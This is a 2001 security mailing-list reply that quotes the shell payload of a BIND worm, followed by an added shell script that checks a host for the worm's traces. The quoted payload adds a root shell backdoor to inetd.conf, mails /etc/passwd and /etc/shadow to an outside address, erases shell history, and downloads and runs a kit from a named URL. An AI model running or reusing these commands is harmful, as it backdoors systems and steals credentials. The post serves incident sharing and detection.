Security Incidents mailing list archives
Re: BIND worm.
From: Andreas Östling <andreaso () it su se>
Date: Fri, 23 Mar 2001 09:32:25 +0100
On Thursday 22 March 2001 12:19, Scott A. McIntyre wrote:
> I'm wondering how many others have seen sign of what appears to be a
> BIND based worm attack that's been passing through here lately.

I've seen it. After the actual BIND exploit, here is what it sends (to port 53/TCP):

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
 /etc/shadow >>1i0n;mail 1i0nip () china com <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit

You can grab the kit from the URL above if you want to analyse it further.
I have a local copy of it if it isn't available there anymore.

Regards,
Andreas Östling
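A host triage check for the two persistent artifacts visible in the payload above (the /dev/.lib directory and the root shell line appended to /etc/inetd.conf). This is an added example, not part of the original post; it generalizes from the port 1008 entry to any inetd entry that runs a shell as root. The function names and the ROOT argument (for checking a mounted disk image) are assumptions of this example.

```shell
#!/bin/sh
# Added example: look for artifacts named in the captured payload.
# ROOT (hypothetical parameter) is a path prefix so a mounted image
# can be examined; an empty ROOT checks the live filesystem.

# Print inetd.conf entries whose user field is root and whose server
# program is a shell. inetd.conf fields: service, socket type,
# protocol, wait flag, user, server program, arguments.
inetd_root_shells() {
    conf="$1/etc/inetd.conf"
    [ -r "$conf" ] || return 0
    awk '!/^[ \t]*#/ && $5 ~ /^root([.:].*)?$/ &&
         $6 ~ /\/(ba|c|k|tc|z)?sh$/ {
             print FILENAME ":" NR ": " $0
         }' "$conf"
}

# Print one line per indicator found; return 1 if anything was found.
check_host() {
    root="${1:-}"
    found=0
    if [ -d "$root/dev/.lib" ]; then
        echo "IOC: directory $root/dev/.lib exists"
        found=1
    fi
    hits=$(inetd_root_shells "$root")
    if [ -n "$hits" ]; then
        echo "IOC: inetd starts a root shell:"
        echo "$hits"
        found=1
    fi
    return "$found"
}

# Usage: check_host /mnt/suspect-image   (or check_host "" for /)
```

A clean result only means these two artifacts are absent; the payload also mails /etc/passwd and /etc/shadow off the host, so credentials on an affected machine need to be treated as exposed.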